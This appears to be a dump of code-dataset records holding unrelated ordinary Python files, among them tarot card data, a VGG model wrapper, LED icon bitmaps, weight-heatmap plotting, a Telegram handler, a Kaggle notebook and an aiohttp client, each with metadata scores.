desc='星币九代表收获与安逸,丰富的物质生活与相对应的束缚。\n\n星币九是一张代表自信或自我依赖的牌,那可说是要达到超凡成就的必要条件。你的自信如果在搭配上自律的话,那将使你在许多层面上获益。\n\n大体上来说,星币九形容由于过去的努力而带来的一种舒适的生活。星币九代表财富的成功与富足,显示对于生活实际投入的层面,并表达了物质与精神层面的相互关系。', upright='Fruits of labor, Rewards, Luxury, Rewarded efforts, Success, Achievement, Independence, Leisure, Material security, Self-sufficiency', reversed='Reckless spending, Living beyond means, False success, Being guarded, Material instability, Superficiality' ), init=False) ten_of_pentacles: TarotCard = field(default=TarotCard( id=73, index='ten_of_pentacles', type='minor_arcana', orig_name='Ten of Pentacles', name='星币十', intro='星币十的近景是一位老年人,他舒服的坐着,身旁围绕着两只狗。拱门外的市镇中有一对青年男女,似乎在讨论什么,还有一个小孩子。十个星币排列成生命之树的符号。', words='富裕', desc='星币十意味归于平静的物质上的成功。\n\n星币十意味物质上的成功,星币十画的是一个安稳而舒适的居家环境。从墙上盾形家徽看得出这是一个富裕而巩固的环境,这个家庭拥有能提供舒适物质环境的一切条件。那么,为什么每个人都没有面对着别人呢?这老人是坐着的,他的注意力放在动物们的身上,年轻人背对我们,而女人也没有面对他,却稍稍侧着脸继续和他谈话。小孩子被忽略了,这些人彼此之间也没有真正的关联。它们得到别人所渴望的物质世界,不过很显然这也使他们感到沉闷,并陷入公式化的生活中,一旦这种公式消失,将无所适从。\n\n星币十是整组牌可能性的充分显示。他缺乏权杖的热情、宝剑的理想以及圣杯牌的情感。在这里可以找到物质上的安全感和稳定,但也付出了代价。', upright='Legacy, Culmination, Inheritance, Roots, Family, Ancestry, Windfall, Foundations, Privilege, Affluence, Stability, Tradition', reversed='Fleeting success, Lack of stability, Lack of resources, Family disputes, Bankruptcy, Debt, Conflict over money, Instability, Breaking traditions' ), init=False) page_of_pentacles: TarotCard = field(default=TarotCard( id=74, index='page_of_pentacles', type='minor_arcana', orig_name='Page of Pentacles', name='星币侍从', intro='星币待从双脚坚稳的站立在地面上,高高捧着星币,他所着迷的东西,在眼前仔细地观察着。他头戴红色软帽头饰,带子围着肩颈。身上的穿着是以棕色为底,套着绿色的外衣,鞋子和腰带也是棕色的。他站在青葱且长满花朵的草地上,远方有茂密的树丛,画面的右下还有一座山。', words='勤奋', desc='星币侍从意味着为理想而努力学习。\n\n星币侍从象征有关金钱、新工作或学习一门课程的消息。它可以表示去学习某些将会产生实质效益的事物。这个侍从通常代表学生的勤奋向学。透过学习一门课程,或于工作中学习,发挥了自己的能力。有时候这个侍从可能暗示你对于正在学习的科目,变得更专注,甚至更重视学习的成果。', upright='Ambition, Desire, Diligence, Ambitious, Diligent, Goal oriented, Planner, Consistent, Star student, Studious, Grounded, Loyal, Faithful, Dependable', reversed='Lack of commitment, Greediness, Laziness, Foolish, Immature, Irresponsible, Lazy, Underachiever, Procrastinator, Missed chances, Poor prospects' ), init=False) knight_of_pentacles: TarotCard = field(default=TarotCard( id=75, index='knight_of_pentacles', type='minor_arcana', orig_name='Knight of Pentacles', name='星币骑士', intro='星币骑士笔直地坐在黑马背上,仔细打量手上的星币。黑色的强壮马匹配着厚实的红色马鞍和缰绳,侧面垂着红色的软坐垫,牢牢地站在地面,是四张骑士牌中唯一不动的座骑。骑士戴着头盔,头盔顶端饰有穗状的绿叶,黑马的头顶也有相同的叶穗。他身着厚重盔甲,外披一件暗红色战袍,也戴着红色的手套。星币骑士处于空旷的大地上,眼前应是一望无际。远方的地面是一片经过细心耕耘的田地,背景是一片鲜黄色。', words='稳健', desc='星币骑士代表稳健而认真的计划。\n\n星币骑士通常指的是强化你的计划,并朝确定的目标迈进。它意味着为了实现一个目标而努力工作。就一个人而言,这个人对于承诺非常的认真,不论是对事业、个人雄心或两性关系。通常,他相信这个格言:“如果你想做好一件事,那就自己动手吧。”', upright='Efficiency, Hard work, Responsibility, Practical, Reliable, Efficient, Stoic, Slow and steady, Hard-working, Committed, Patient, Conservative', reversed='Laziness, Obsessiveness, Work without reward, Workaholic, Dull, Boring, No initiative, Cheap, Irresponsible, Gambler, Risky investments' ), init=False) queen_of_pentacles: TarotCard = field(default=TarotCard( id=76, index='queen_of_pentacles', type='minor_arcana', orig_name='Queen of Pentacles', name='星币皇后', intro='星币皇后的面貌端庄而正直,双手捧着星币,并低头凝望着星币,神情若有所思。她的后冠是圆顶的,中间有插着两根红色羽毛,星币皇后的后袍是红色的,内衫露出的袖子是白色的,是红白对立的组合,绿色的披风由头上往下延伸到椅上。皇后的宝座处在长满丰盛植物的平原上,在茂密的林荫中,玫瑰花围绕成的拱门之下,所在的草地之上盛开着多株玫瑰花,。座椅是精工雕琢的,刻满了纹饰。有许多植物和天使的图案,很像圣杯皇后的座椅,扶前端有羊头的浮雕,椅侧有小孩的浮雕,椅背刻满了藤蔓瓜叶。宝座旁的近景是一片肥沃的土地,满是绿草和花朵。', words='安定', desc='星币皇后意味着喜爱大自然,又有良好的商业眼光。\n\n从一般观点来看,星币皇后是一张代表信任自己能力的牌。她意味经由深思熟虑而带来成功。作为一个人,星币皇后通常有着敏锐的生意眼光,而且总是喜欢存点钱在身边,好让自己有安全感。在有需要的时候她会很节俭,而且不会任意炫耀财富。她是一个可靠、实际的人,知道应该在那里下功夫可以得到最大的成功。\n\n这张皇后牌是指务实、可靠,并擅长喂养植物和动物。她也喜欢经常到乡间旅行,或漫步于大自然中,因为她需要和自然保持接触,让生命有完整而踏实的感觉。', upright='Practicality, Creature comforts, Financial security, Generous, Caring, Nurturing, Homebody, Good business sense, Practical, Comforting, Welcoming, Sensible, Luxurious', reversed='Self-centeredness, Jealousy, Smothering, Selfish, Unkempt, Jealous, Insecure, Greedy, Materialistic, Gold digger, Intolerant, Self-absorbed, Envious' ), init=False) king_of_pentacles: TarotCard = field(default=TarotCard( id=77, index='king_of_pentacles', type='minor_arcana', orig_name='King of Pentacles', name='星币国王', intro='星币国王悠然自得的坐在他的花园里。他的左手拿着星币,右手拿着权杖,姿态轻松。花围中长满象征丰收成果的葡萄和各种植物,他的服装也满是葡萄图案,整个人似乎与大自然融成一体。宝座上有牛头图案,是星币的家族图腾。国王的右手靠在座椅的扶手上,掌中握着宝球权柄。左手持拥五芒星金币,并垫起左脚让这枚大金币更稳定确实地置于膝上。国王慵懒地靠在椅背上,低眼安然地端详着他的金币。', words='坚定', desc='星币国王表示务实而坚定的态度可以带来成功。\n\n星币国王暗示透过身体力行而达到成功。它也可以说是务实的努力带来物质上的成功。星币国王代表的是一个脚踏实地而又成熟的人。他的个性稳健、可靠且保守,并能努力履行其承诺,谨慎的负起他应负的责任。他不像权杖国王般富冒险精神,或像圣杯国王那么有创意,但他可凭藉着慢慢而稳定的步伐,以及认真的实践来达到成功。', upright='Abundance, Prosperity, Security, Ambitious, Safe, Kind, Patriarchal, Protective, Businessman, Provider, Sensual, Reliable', reversed='Greed, Indulgence, Sensuality, Materialistic, Wasteful, Chauvanist, Poor financial decisions, Gambler, Exploitative, Possessive' ), init=False) class TarotPacks(object): """ 定义套牌 """ SpecialCard: TarotPack = TarotPack( name='special', cards=[card for card in TarotCards.get_all_cards() if card.type == 'special']) MajorArcana: TarotPack = TarotPack( name='major_arcana', cards=[card for card in TarotCards.get_all_cards() if card.type == 'major_arcana']) MinorArcana: TarotPack = TarotPack( name='minor_arcana', cards=[card for card in TarotCards.get_all_cards() if card.type == 'minor_arcana']) RiderWaite: TarotPack = TarotPack( name='rider_waite', cards=[card for card in TarotCards.get_all_cards() if ( card.type == 'major_arcana' or card.type == 'minor_arcana')]) __all__ = [ 'TarotCards', 'TarotPacks' ]
zh
0.782484
@Author : Ailitonia @Date : 2021/08/31 21:24 @FileName : tarot_data.py @Project : nonebot2_miya @Description : 塔罗卡牌及卡组数据 虽然这里看起来使用 json 会更好 但还是用 dataclass 硬编码了:( @GitHub : https://github.com/Ailitonia @Software : PyCharm 所有卡牌 每个属性都是一张牌 获取所有塔罗牌的列表 :return: List[TarotCard] 定义套牌
2.582664
3
models/cifar/vgg19.py
Shimaa1/group_activity_gcn
1
6618643
<reponame>Shimaa1/group_activity_gcn<filename>models/cifar/vgg19.py '''VGG for CIFAR10. FC layers are removed. (c) <NAME> ''' import torch import torch.nn as nn import torch.nn.functional as F import torch.utils.model_zoo as model_zoo import math import numpy as np import torchvision.models as models #from mypath import Path from torch.autograd import Variable from models.cifar.gcn import _gcn class vgg(_gcn): def __init__(self, num_classes=1000, net='vgg19', model_dir=''): _gcn.__init__(self, num_classes) self.net = net self.group_cls = num_classes self.model_dir = model_dir def _init_modules(self): if self.net == 'vgg19': model = models.vgg19() model.classifier = nn.Sequential( nn.Linear(3072, 4096), nn.ReLU(True), nn.Dropout(p=0), nn.Linear(4096, 4096), nn.ReLU(True), nn.Dropout(p=0), nn.Linear(4096, 9), ) state_dict = torch.load(self.model_dir) model.load_state_dict({k:v for k,v in state_dict['state_dict'].items() if k in model.state_dict()}) elif self.net == 'vgg19_bn': model = models.vgg19_bn() print("Loading pretrained weights from %s" % Path.model_dir(self.net)) self._load_pretrained_weights(self.net) #self.player_cls = nn.Sequential(*list(model.classifier._modules.values())[-2:]) model.classifier = nn.Sequential(*list(model.classifier._modules.values())[:-1]) self.base_model = model
'''VGG for CIFAR10. FC layers are removed. (c) <NAME> ''' import torch import torch.nn as nn import torch.nn.functional as F import torch.utils.model_zoo as model_zoo import math import numpy as np import torchvision.models as models #from mypath import Path from torch.autograd import Variable from models.cifar.gcn import _gcn class vgg(_gcn): def __init__(self, num_classes=1000, net='vgg19', model_dir=''): _gcn.__init__(self, num_classes) self.net = net self.group_cls = num_classes self.model_dir = model_dir def _init_modules(self): if self.net == 'vgg19': model = models.vgg19() model.classifier = nn.Sequential( nn.Linear(3072, 4096), nn.ReLU(True), nn.Dropout(p=0), nn.Linear(4096, 4096), nn.ReLU(True), nn.Dropout(p=0), nn.Linear(4096, 9), ) state_dict = torch.load(self.model_dir) model.load_state_dict({k:v for k,v in state_dict['state_dict'].items() if k in model.state_dict()}) elif self.net == 'vgg19_bn': model = models.vgg19_bn() print("Loading pretrained weights from %s" % Path.model_dir(self.net)) self._load_pretrained_weights(self.net) #self.player_cls = nn.Sequential(*list(model.classifier._modules.values())[-2:]) model.classifier = nn.Sequential(*list(model.classifier._modules.values())[:-1]) self.base_model = model
en
0.414746
VGG for CIFAR10. FC layers are removed. (c) <NAME> #from mypath import Path #self.player_cls = nn.Sequential(*list(model.classifier._modules.values())[-2:])
2.445785
2
ledmatrix/components/icon.py
mattgrogan/ledmatrix
1
6618644
<reponame>mattgrogan/ledmatrix from PIL import Image, ImageColor from components import Viewport_NoScroll_Mixin # TODO: Allow for different types of icons (scroll, noscroll, animated, etc.) class Icon(Viewport_NoScroll_Mixin): """ Create an icon image """ @staticmethod # def Icon(icon_name, color="#FFFFFF"): def Icon(data): icon_name = data["icon_name"] color = data["icon_color"] return Icon.Build(BMP[icon_name], color) @staticmethod def Build(bitmap, color="#FFFFFF"): im = Image.new("RGB", (12, 12)) pix = im.load() for x in range(12): for y in range(12): row = bitmap[y] cell = row & (1 << (12 - x - 1)) pix[x, y] = ImageColor.getrgb(color) if cell else (0, 0, 0) return Icon(im) def __init__(self, icon): self.image = icon self.reset() @property def size(self): return self.image.size BMP = {} BMP["sunny"] = [0x020, 0x422, 0x204, 0x0F0, 0x1F8, 0xDF8, 0x1FB, 0x1F8, 0x0F0, 0x204, 0x442, 0x040] BMP["cloud"] = [0x000, 0x000, 0x000, 0x018, 0x1A4, 0x242, 0x402, 0x402, 0x244, 0x1B8, 0x000, 0x000] BMP["lightning"] = [0x008, 0x018, 0x030, 0x070, 0x0E0, 0x1FC, 0x3F8, 0x070, 0x0E0, 0x0C0, 0x180, 0x100] BMP["house"] = [0x060, 0x0F0, 0x1F8, 0x3FC, 0x7FE, 0xFFF, 0xFFF, 0x264, 0x264, 0x3FC, 0x3FC, 0x3FC] BMP["clock"] = [0x0F0, 0x30C, 0x402, 0x406, 0x909, 0x891, 0x861, 0x801, 0x402, 0x402, 0x30C, 0x0F0] BMP["end"] = [0x180, 0x3FC, 0x7FC, 0x7FC, 0x3FC, 0x180, 0x000, 0xEE2, 0xAA2, 0xEAE, 0x8AA, 0xEAE] BMP["bulb"] = [0x040, 0x444, 0x208, 0x0E0, 0x110, 0xD16, 0x110, 0x0E0, 0x000, 0x0E0, 0x0E0, 0x0E0] BMP["train"] = [0x1F8, 0x30C, 0x3FC, 0x204, 0x204, 0x3FC, 0x3FC, 0x36C, 0x3FC, 0x090, 0x108, 0x204] BMP["exclamation"] = [0x070, 0x070, 0x070, 0x060, 0x060, 0x060, 0x040, 0x040, 0x040, 0x000, 0x0C0, 0x0C0]
from PIL import Image, ImageColor from components import Viewport_NoScroll_Mixin # TODO: Allow for different types of icons (scroll, noscroll, animated, etc.) class Icon(Viewport_NoScroll_Mixin): """ Create an icon image """ @staticmethod # def Icon(icon_name, color="#FFFFFF"): def Icon(data): icon_name = data["icon_name"] color = data["icon_color"] return Icon.Build(BMP[icon_name], color) @staticmethod def Build(bitmap, color="#FFFFFF"): im = Image.new("RGB", (12, 12)) pix = im.load() for x in range(12): for y in range(12): row = bitmap[y] cell = row & (1 << (12 - x - 1)) pix[x, y] = ImageColor.getrgb(color) if cell else (0, 0, 0) return Icon(im) def __init__(self, icon): self.image = icon self.reset() @property def size(self): return self.image.size BMP = {} BMP["sunny"] = [0x020, 0x422, 0x204, 0x0F0, 0x1F8, 0xDF8, 0x1FB, 0x1F8, 0x0F0, 0x204, 0x442, 0x040] BMP["cloud"] = [0x000, 0x000, 0x000, 0x018, 0x1A4, 0x242, 0x402, 0x402, 0x244, 0x1B8, 0x000, 0x000] BMP["lightning"] = [0x008, 0x018, 0x030, 0x070, 0x0E0, 0x1FC, 0x3F8, 0x070, 0x0E0, 0x0C0, 0x180, 0x100] BMP["house"] = [0x060, 0x0F0, 0x1F8, 0x3FC, 0x7FE, 0xFFF, 0xFFF, 0x264, 0x264, 0x3FC, 0x3FC, 0x3FC] BMP["clock"] = [0x0F0, 0x30C, 0x402, 0x406, 0x909, 0x891, 0x861, 0x801, 0x402, 0x402, 0x30C, 0x0F0] BMP["end"] = [0x180, 0x3FC, 0x7FC, 0x7FC, 0x3FC, 0x180, 0x000, 0xEE2, 0xAA2, 0xEAE, 0x8AA, 0xEAE] BMP["bulb"] = [0x040, 0x444, 0x208, 0x0E0, 0x110, 0xD16, 0x110, 0x0E0, 0x000, 0x0E0, 0x0E0, 0x0E0] BMP["train"] = [0x1F8, 0x30C, 0x3FC, 0x204, 0x204, 0x3FC, 0x3FC, 0x36C, 0x3FC, 0x090, 0x108, 0x204] BMP["exclamation"] = [0x070, 0x070, 0x070, 0x060, 0x060, 0x060, 0x040, 0x040, 0x040, 0x000, 0x0C0, 0x0C0]
en
0.646117
# TODO: Allow for different types of icons (scroll, noscroll, animated, etc.) Create an icon image # def Icon(icon_name, color="#FFFFFF"):
3.033034
3
src/netcompany_toolkit/service/SharepointService.py
WypeBoard/incident_numbers
0
6618645
from src.netcompany_toolkit.Settings import Settings from src.netcompany_toolkit.model.Sharepoint import Sharepoint from src.netcompany_toolkit.model.enum.SharepointStatus import SharepointStatus def _get_sharepoint() -> Sharepoint: _config = Settings() return Sharepoint(_config) def fetch_case_with_id(case_id: str) -> dict: sharepoint = _get_sharepoint() return sharepoint.get_specific_case(case_id) def update_status(case_id: int, status: SharepointStatus): pass def fetch_case_view() -> list: sharepoint = _get_sharepoint() return sharepoint.get_personal_case_view()
from src.netcompany_toolkit.Settings import Settings from src.netcompany_toolkit.model.Sharepoint import Sharepoint from src.netcompany_toolkit.model.enum.SharepointStatus import SharepointStatus def _get_sharepoint() -> Sharepoint: _config = Settings() return Sharepoint(_config) def fetch_case_with_id(case_id: str) -> dict: sharepoint = _get_sharepoint() return sharepoint.get_specific_case(case_id) def update_status(case_id: int, status: SharepointStatus): pass def fetch_case_view() -> list: sharepoint = _get_sharepoint() return sharepoint.get_personal_case_view()
none
1
1.952308
2
plotting/old/plot_new.py
knc-neural-calculus/HH-neurons-learning
0
6618646
import os import sys import numpy as np import matplotlib.pyplot as plt def plot_weights_dist(dirname, idx_str): bins = np.linspace(-2.0,2.0, 50) print('reading files:') for n in range(0,12000,100): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % n print('\t' + filename) if not os.path.isfile(filename): break else: all_weights = np.genfromtxt(filename, delimiter=',').flatten() hist, _ = np.histogram(all_weights,bins) plt.plot(bins[:-1], hist, label=('e=%d' % n), c=[(n/100) / 120, 0.2, 0.2]) plt.show() def plot_weights_neg_percent(dirname, idx_str): bins = np.linspace(-2.0,2.0, 50) x = range(0,12000,100) y = [] print('reading files:') for n in range(0,12000,100): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % n print('\t' + filename) if not os.path.isfile(filename): break else: all_weights = np.genfromtxt(filename, delimiter=',').flatten() n_neg = 0 for w in all_weights: if w < 0: n_neg += 1 y.append(100 * n_neg / len(all_weights)) plt.plot(x, y) plt.show() def heatmap_alt(dirname, idx_str, fig, ax, epoch): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % epoch W = np.genfromtxt(filename, delimiter=',') X = range(0, W.shape[0]) Y = range(0, W.shape[1]) im = ax.imshow(W, cmap='hot', interpolation='nearest') ax.set_title("epoch = %d, idx_str = %s" % (epoch, idx_str)) cbar = ax.figure.colorbar(im, ax=ax) def heatmap(dirname, idx_str, fig, ax, epoch, row_idx): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % epoch W = np.genfromtxt(filename, delimiter=',') W = W[row_idx][:-1] W = W.reshape((28, 28)) X = range(0, W.shape[0]) Y = range(0, W.shape[1]) im = ax.imshow(W, cmap='hot', interpolation='nearest') # ax.set_title("e %d, r %d" % (epoch, row_idx)) # cbar = ax.figure.colorbar(im, ax=ax) ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) if __name__ == "__main__": epochs = [0, 1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000, 10000, 11000, 11900 ] rows = [80 + i for i in range(10)] fig, axs = plt.subplots(len(rows), len(epochs)) for i, r in enumerate(rows): for j, e in enumerate(epochs): print(i, j) heatmap(sys.argv[1], 'W1', fig, axs[i][j], e, r) # fig.tight_layout() plt.show()
import os import sys import numpy as np import matplotlib.pyplot as plt def plot_weights_dist(dirname, idx_str): bins = np.linspace(-2.0,2.0, 50) print('reading files:') for n in range(0,12000,100): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % n print('\t' + filename) if not os.path.isfile(filename): break else: all_weights = np.genfromtxt(filename, delimiter=',').flatten() hist, _ = np.histogram(all_weights,bins) plt.plot(bins[:-1], hist, label=('e=%d' % n), c=[(n/100) / 120, 0.2, 0.2]) plt.show() def plot_weights_neg_percent(dirname, idx_str): bins = np.linspace(-2.0,2.0, 50) x = range(0,12000,100) y = [] print('reading files:') for n in range(0,12000,100): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % n print('\t' + filename) if not os.path.isfile(filename): break else: all_weights = np.genfromtxt(filename, delimiter=',').flatten() n_neg = 0 for w in all_weights: if w < 0: n_neg += 1 y.append(100 * n_neg / len(all_weights)) plt.plot(x, y) plt.show() def heatmap_alt(dirname, idx_str, fig, ax, epoch): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % epoch W = np.genfromtxt(filename, delimiter=',') X = range(0, W.shape[0]) Y = range(0, W.shape[1]) im = ax.imshow(W, cmap='hot', interpolation='nearest') ax.set_title("epoch = %d, idx_str = %s" % (epoch, idx_str)) cbar = ax.figure.colorbar(im, ax=ax) def heatmap(dirname, idx_str, fig, ax, epoch, row_idx): filename = dirname + idx_str + '/weights_' + idx_str + '_e-%d.csv' % epoch W = np.genfromtxt(filename, delimiter=',') W = W[row_idx][:-1] W = W.reshape((28, 28)) X = range(0, W.shape[0]) Y = range(0, W.shape[1]) im = ax.imshow(W, cmap='hot', interpolation='nearest') # ax.set_title("e %d, r %d" % (epoch, row_idx)) # cbar = ax.figure.colorbar(im, ax=ax) ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) if __name__ == "__main__": epochs = [0, 1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000, 10000, 11000, 11900 ] rows = [80 + i for i in range(10)] fig, axs = plt.subplots(len(rows), len(epochs)) for i, r in enumerate(rows): for j, e in enumerate(epochs): print(i, j) heatmap(sys.argv[1], 'W1', fig, axs[i][j], e, r) # fig.tight_layout() plt.show()
en
0.105239
# ax.set_title("e %d, r %d" % (epoch, row_idx)) # cbar = ax.figure.colorbar(im, ax=ax) # fig.tight_layout()
2.501467
3
course_mgr/info_handler.py
TutorSim/tutorsim
0
6618647
from telegram import Update from telegram.ext import Dispatcher, CommandHandler, MessageHandler, Filters, ConversationHandler, CallbackContext from course_mgr.course_info import CourseInfo class InfoHandler(): def __init__(self, info:CourseInfo): self.information = info self.handler = CommandHandler('info', self.info) def get_handler(self) -> Dispatcher: return self.handler def get_help(self): return f"/info: 수업 관련 정보를 확인할 수 있습니다." def cancel(self, update: Update, context: CallbackContext) -> None: """Display the gathered info and end the conversation.""" update.message.reply_text("취소 되었습니다.") context.user_data.clear() def info(self, update: Update, context: CallbackContext) -> None: text = self.information.get_text() update.message.reply_text(text)
from telegram import Update from telegram.ext import Dispatcher, CommandHandler, MessageHandler, Filters, ConversationHandler, CallbackContext from course_mgr.course_info import CourseInfo class InfoHandler(): def __init__(self, info:CourseInfo): self.information = info self.handler = CommandHandler('info', self.info) def get_handler(self) -> Dispatcher: return self.handler def get_help(self): return f"/info: 수업 관련 정보를 확인할 수 있습니다." def cancel(self, update: Update, context: CallbackContext) -> None: """Display the gathered info and end the conversation.""" update.message.reply_text("취소 되었습니다.") context.user_data.clear() def info(self, update: Update, context: CallbackContext) -> None: text = self.information.get_text() update.message.reply_text(text)
en
0.763833
Display the gathered info and end the conversation.
2.486872
2
notebooks/featured-70/fork-of-explore-a-bit.py
anonymous-authorss/DS-Pipeline
0
6618648
# coding: utf-8 # In[ ]: # This Python 3 environment comes with many helpful analytics libraries installed # It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python # For example, here's several helpful packages to load in import numpy as np # linear algebra import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory import os print(os.listdir("../input")) # Any results you write to the current directory are saved as output. # In[ ]: import matplotlib.pyplot as plt import matplotlib.image as mpimg import numpy as np FOLDER = "../input/google-ai-open-images-visual-relationship-track/test/challenge2018_test" image_filenames = os.listdir(FOLDER) fig = plt.figure(figsize=(12,12)) # In[ ]: N_IMAGES = 10 import random for i in range(N_IMAGES): path = FOLDER + "/" + image_filenames[i] img = mpimg.imread(path) plt.imshow(img[:,:,::-1], aspect='auto') plt.show() # # Train Data - What is there? # In[ ]: train_fol = "../input/challenge-2018-train-image-relationship/challenge-2018-train-vrd.csv" import pandas as pd import numpy as np df = pd.read_csv(train_fol) # Relationships relationship = df.RelationshipLabel.value_counts() print(relationship) # In[ ]: df[df.ImageID == '00379950569d024c'] # # So, mostly relationship is 'is' # In[ ]: # Object 1 Label lab_name1 = df.LabelName1.value_counts() print(lab_name1) # # So mostly label 1 is '/m/01mzpv' (Chair, next is Man) # In[ ]: lab_name2 = df.LabelName2.value_counts() print(lab_name2) # # Mostly Label2 is '/m/083vt' # In[ ]: # Combined Triplet df['triplet'] = df['LabelName1'] + ' ' + df['RelationshipLabel'] + ' ' + df['LabelName2'] print(df.triplet.value_counts()) # In[ ]: del df['triplet'] df.describe() # # Lets take the MEAN and use it for all prediction # In[ ]: means = [0.373899, 0.624713, 0.426304, 0.785764, 0.333565, 0.666269, 0.500565, 0.807825] sub = pd.DataFrame(columns=df.columns) N = len(image_filenames) sub['ImageID'] = image_filenames sub['LabelName1'] = ['/m/01mzpv']*N sub['LabelName2'] = ['/m/04bcr3']*N cols = df.columns for i in range(3,len(cols)-1): col = cols[i] sub[col] = [means[i-3]]*N sub['RelationshipLabel'] = ['is']*N def get_pred(df): pred = '0.500000' pred = pred + ' ' + df['LabelName1'] + ' ' + str(df[cols[3]]) + ' ' + str(df[cols[5]]) + ' ' + str(df[cols[4]]) + ' ' + str(df[cols[6]]) + ' '+ df['LabelName2'] + ' ' + str(df[cols[7]]) + ' ' + str(df[cols[9]]) + ' ' + str(df[cols[8]]) + ' ' + str(df[cols[10]]) pred += ' ' + df['RelationshipLabel'] return pred sub['PredictionString'] = sub.apply(get_pred, axis=1) final = pd.DataFrame() def remove_jpg_ext(v): return v[:-4] final['ImageId'] = sub['ImageID'].apply(remove_jpg_ext) final['PredictionString'] = sub['PredictionString'] # In[ ]: # sample_file = "../input/VRD_sample_submission.csv" # import pandas as pd # sample = pd.read_csv(sample_file) # sample.head() # In[ ]: # In[ ]: print(final.head()) final.to_csv('submission_final_chair_at_table.csv', index=False)
# coding: utf-8 # In[ ]: # This Python 3 environment comes with many helpful analytics libraries installed # It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python # For example, here's several helpful packages to load in import numpy as np # linear algebra import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory import os print(os.listdir("../input")) # Any results you write to the current directory are saved as output. # In[ ]: import matplotlib.pyplot as plt import matplotlib.image as mpimg import numpy as np FOLDER = "../input/google-ai-open-images-visual-relationship-track/test/challenge2018_test" image_filenames = os.listdir(FOLDER) fig = plt.figure(figsize=(12,12)) # In[ ]: N_IMAGES = 10 import random for i in range(N_IMAGES): path = FOLDER + "/" + image_filenames[i] img = mpimg.imread(path) plt.imshow(img[:,:,::-1], aspect='auto') plt.show() # # Train Data - What is there? # In[ ]: train_fol = "../input/challenge-2018-train-image-relationship/challenge-2018-train-vrd.csv" import pandas as pd import numpy as np df = pd.read_csv(train_fol) # Relationships relationship = df.RelationshipLabel.value_counts() print(relationship) # In[ ]: df[df.ImageID == '00379950569d024c'] # # So, mostly relationship is 'is' # In[ ]: # Object 1 Label lab_name1 = df.LabelName1.value_counts() print(lab_name1) # # So mostly label 1 is '/m/01mzpv' (Chair, next is Man) # In[ ]: lab_name2 = df.LabelName2.value_counts() print(lab_name2) # # Mostly Label2 is '/m/083vt' # In[ ]: # Combined Triplet df['triplet'] = df['LabelName1'] + ' ' + df['RelationshipLabel'] + ' ' + df['LabelName2'] print(df.triplet.value_counts()) # In[ ]: del df['triplet'] df.describe() # # Lets take the MEAN and use it for all prediction # In[ ]: means = [0.373899, 0.624713, 0.426304, 0.785764, 0.333565, 0.666269, 0.500565, 0.807825] sub = pd.DataFrame(columns=df.columns) N = len(image_filenames) sub['ImageID'] = image_filenames sub['LabelName1'] = ['/m/01mzpv']*N sub['LabelName2'] = ['/m/04bcr3']*N cols = df.columns for i in range(3,len(cols)-1): col = cols[i] sub[col] = [means[i-3]]*N sub['RelationshipLabel'] = ['is']*N def get_pred(df): pred = '0.500000' pred = pred + ' ' + df['LabelName1'] + ' ' + str(df[cols[3]]) + ' ' + str(df[cols[5]]) + ' ' + str(df[cols[4]]) + ' ' + str(df[cols[6]]) + ' '+ df['LabelName2'] + ' ' + str(df[cols[7]]) + ' ' + str(df[cols[9]]) + ' ' + str(df[cols[8]]) + ' ' + str(df[cols[10]]) pred += ' ' + df['RelationshipLabel'] return pred sub['PredictionString'] = sub.apply(get_pred, axis=1) final = pd.DataFrame() def remove_jpg_ext(v): return v[:-4] final['ImageId'] = sub['ImageID'].apply(remove_jpg_ext) final['PredictionString'] = sub['PredictionString'] # In[ ]: # sample_file = "../input/VRD_sample_submission.csv" # import pandas as pd # sample = pd.read_csv(sample_file) # sample.head() # In[ ]: # In[ ]: print(final.head()) final.to_csv('submission_final_chair_at_table.csv', index=False)
en
0.831532
# coding: utf-8 # In[ ]: # This Python 3 environment comes with many helpful analytics libraries installed # It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python # For example, here's several helpful packages to load in # linear algebra # data processing, CSV file I/O (e.g. pd.read_csv) # Input data files are available in the "../input/" directory. # For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory # Any results you write to the current directory are saved as output. # In[ ]: # In[ ]: # # Train Data - What is there? # In[ ]: # Relationships # In[ ]: # # So, mostly relationship is 'is' # In[ ]: # Object 1 Label # # So mostly label 1 is '/m/01mzpv' (Chair, next is Man) # In[ ]: # # Mostly Label2 is '/m/083vt' # In[ ]: # Combined Triplet # In[ ]: # # Lets take the MEAN and use it for all prediction # In[ ]: # In[ ]: # sample_file = "../input/VRD_sample_submission.csv" # import pandas as pd # sample = pd.read_csv(sample_file) # sample.head() # In[ ]: # In[ ]:
2.775509
3
waio/client/http.py
dotX12/waio
24
6618649
<reponame>dotX12/waio<filename>waio/client/http.py import aiohttp import ujson from urllib.parse import unquote from typing import Optional, Union, Dict, Any, List, Tuple from aiohttp import ContentTypeError from waio.client.exceptions import FailedDecodeJson class HTTPClient: async def request( self, method: str, url: str, headers: Optional[Dict[str, Any]] = None, **kwargs, ) -> Tuple[Dict[str, Any], int]: if not headers: headers = {} async with aiohttp.ClientSession(headers=headers) as session: async with session.request(method=method, url=url, **kwargs) as resp: return await self.generate_json_from_response(resp) async def generate_json_from_response( self, resp: aiohttp.ClientResponse ) -> Tuple[Dict[str, Any], int]: content_type = resp.headers.get('Content-Type') try: if content_type == 'text/plain': resp_text = await resp.text() resp_json = ujson.loads(resp_text) return self.decode_json(resp_json), resp.status elif content_type == 'application/json': resp_json = await resp.json() return resp_json, resp.status except ContentTypeError as e: raise FailedDecodeJson(f"Check args, URL is invalid - {e}") 